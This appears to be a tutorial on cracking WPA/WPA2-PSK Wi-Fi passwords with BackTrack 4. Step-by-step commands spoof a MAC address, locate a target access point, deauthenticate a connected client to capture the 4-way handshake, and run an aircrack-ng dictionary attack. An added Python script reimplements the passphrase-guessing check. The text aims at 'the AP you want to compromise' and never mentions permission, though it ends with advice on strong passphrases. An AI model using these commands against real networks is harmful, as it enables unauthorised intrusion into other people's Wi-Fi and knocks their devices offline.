How to Crack WPA-PSK and WPA2 with BackTrack 4 Beta
The mechanics of cracking WPA-PSK are simple and straightforward. There are two constraints: it is a dictionary attack, so once you have captured the 4-way handshake the passphrase must actually be in your wordlist, and a client must be connected to the AP you want to compromise, because the handshake is obtained by forcing that client to reconnect. I am using an HP Pavilion laptop with a Raylink wireless USB adapter; I booted BackTrack 4 from CD and I am ready to begin.
First, stop the wireless interface so its settings (the MAC address, below) can be changed:
airmon-ng stop wlan0
(wlan0 is my wireless USB adapter). If I am unsure what devices I have, I run
ifconfig -a
to list all available NICs.
Now bring the wireless interface down by typing
ifconfig wlan0 down
I am now ready to assign a fake MAC address to my USB device (the interface name is a required argument):
macchanger --mac 00:11:22:33:44:55 wlan0
Any MAC address will do as long as it is well formed (six hex octets) and unicast (even first octet); this one is simply easy to remember. Before the capture steps below, bring the interface back up and put it into monitor mode, otherwise airodump-ng cannot see raw 802.11 frames (airmon-ng start does this; on BackTrack 4 it creates a monitor interface such as mon0, and whichever interface name it reports is the one to use in place of wlan0 from here on).
Next you must identify the BSSID and channel of the AP you want to crack:
airodump-ng wlan0
This lists every AP within range of your card, followed by the stations it sees associated with them. The screen will look something like this:

BSSID              PWR  Beacons  #Data  #/s  CH  MB  ENC   CIPHER  AUTH  ESSID
00:1C:58:AE:C3:01  -60      124      1    0   1  54  WPA2  CCMP    PSK   Network

BSSID              STATION            PWR  Rate  Lost  Packets  Probe
00:1C:58:AE:C3:01  00:1B:66:AD:C6:00  -57  0- 1             48  Network
You need the BSSID and channel from the first table, and the station MAC from the second, to proceed:
airodump-ng -c 1 -w wpa1 --bssid 00:1C:58:AE:C3:01 wlan0
This locks the card to channel 1, captures only traffic to and from that AP, and writes it to a capture file with the prefix wpa1 (airodump-ng names it wpa1-01.cap). aircrack-ng later reads the 4-way handshake from this file; it does not decrypt the password out of it, it tests dictionary words against the handshake.
Now open a new shell; we are ready to capture the handshake between a workstation and the AP.
aireplay-ng -0 10 -a 00:1C:58:AE:C3:01 -c 00:1B:66:AD:C6:00 wlan0
This sends 10 deauthentication frames to the client on behalf of the AP (-a is the AP's BSSID, -c the station MAC from the airodump-ng listing). The client drops off and reassociates, and the new 4-way handshake is what we capture. When you have it, the airodump-ng window shows "WPA handshake: 00:1C:58:AE:C3:01" in its top right corner. If the message does not appear, the client may be out of range of your card: the deauth has to reach the client, not just the AP.
Now you are ready to crack the password. Stop both the airodump-ng and aireplay-ng shells and open a final new shell. BackTrack 4 ships a dictionary file you can use, though I suggest extending it with additional passwords for a more thorough attack. It is located under /pentest/wireless/cowpatty and is named dict. You can navigate to it with Konqueror or on the command line. In your new console, type
aircrack-ng -w /pentest/wireless/cowpatty/dict wpa1-01.cap
If the passphrase is in your dict file, the crack takes only a few moments and the key is shown on screen (KEY FOUND!). If aircrack-ng reports that the passphrase was not in the dictionary, the handshake was still valid; only the wordlist was wrong.
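To make clear what aircrack-ng is doing in that last step (and why the attack is only as good as the wordlist), here is an added example, not code from the original post or from the aircrack-ng project, that performs the same check in pure Python: derive the PMK from each candidate passphrase with PBKDF2 (4096 iterations, as 802.11i specifies), expand it to the PTK, and see whether the resulting KCK reproduces the MIC in message 2 of the captured handshake. The ESSID and MAC addresses are taken from the airodump-ng listing above; the nonces, the "real" passphrase, the message-2 frame and the wordlist are constructed inline so the script runs offline.

```python
import hashlib
import hmac

# Fixed field offsets inside an EAPOL-Key frame (IEEE 802.11i):
# EAPOL header 4 | descriptor type 1 | key info 2 | key length 2 | replay counter 8
# | key nonce 32 | key IV 16 | key RSC 8 | key ID 8 | key MIC 16 | key data len 2 | key data
MIC_OFFSET = 81
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make every dictionary guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes of the PTK are the KCK used to MIC the EAPOL frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 20 bytes = 80; the PTK is the first 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist):
    """What aircrack-ng -w does per candidate: PMK -> PTK -> KCK, then compare MICs.
    Returns the matching passphrase, or None if it is not in the wordlist."""
    target_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), target_mic):
            return candidate
    return None


def build_message2(ssid, passphrase, ap_mac, sta_mac, anonce, snonce):
    """Constructed stand-in for the message 2 (station -> AP) airodump-ng would capture,
    with a valid MIC computed from the given passphrase."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2, CCMP, PSK
    body = (
        b"\x02"                  # descriptor type: RSN (WPA2)
        + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1), pairwise, MIC present
        + b"\x00\x10"            # key length 16 (CCMP)
        + b"\x00" * 7 + b"\x01"  # replay counter
        + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
        + b"\x00" * MIC_LEN      # MIC placeholder, filled in below
        + len(rsn_ie).to_bytes(2, "big") + rsn_ie
    )
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type EAPOL-Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + MIC_LEN:]


def demo():
    ssid = "Network"                            # ESSID from the airodump-ng listing
    ap_mac = bytes.fromhex("001c58aec301")      # BSSID from the listing
    sta_mac = bytes.fromhex("001b66adc600")     # STATION from the listing
    anonce = bytes(range(32))                   # constructed nonces; real ones are random
    snonce = bytes(range(32, 64))
    real_passphrase = "welcome2wifi"            # constructed; not any real network's key
    msg2 = build_message2(ssid, real_passphrase, ap_mac, sta_mac, anonce, snonce)
    wordlist = ["password", "12345678", "letmein", "welcome2wifi", "qwertyuiop"]
    return crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs a full 4096-iteration PBKDF2 run, and nothing in the handshake lets you shortcut that; aircrack-ng is doing exactly this loop, just faster. A passphrase that is not in the list is never found, and a long random one is in no list.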
Some networks rotate the pre-shared key on a schedule, and many use long random passphrases, which makes this attack impractical: the captured handshake gives you an offline test for guesses, but every guess costs a 4096-iteration PBKDF2 run, so only a passphrase that appears in your wordlist will ever be found. Bottom line: if you are a company running WPA-PSK with a long random passphrase, the key is out of reach of any dictionary an attacker can afford to run, even with hours of time and a dict file hundreds of megabytes in size; a short or predictable passphrase, on the other hand, falls in moments.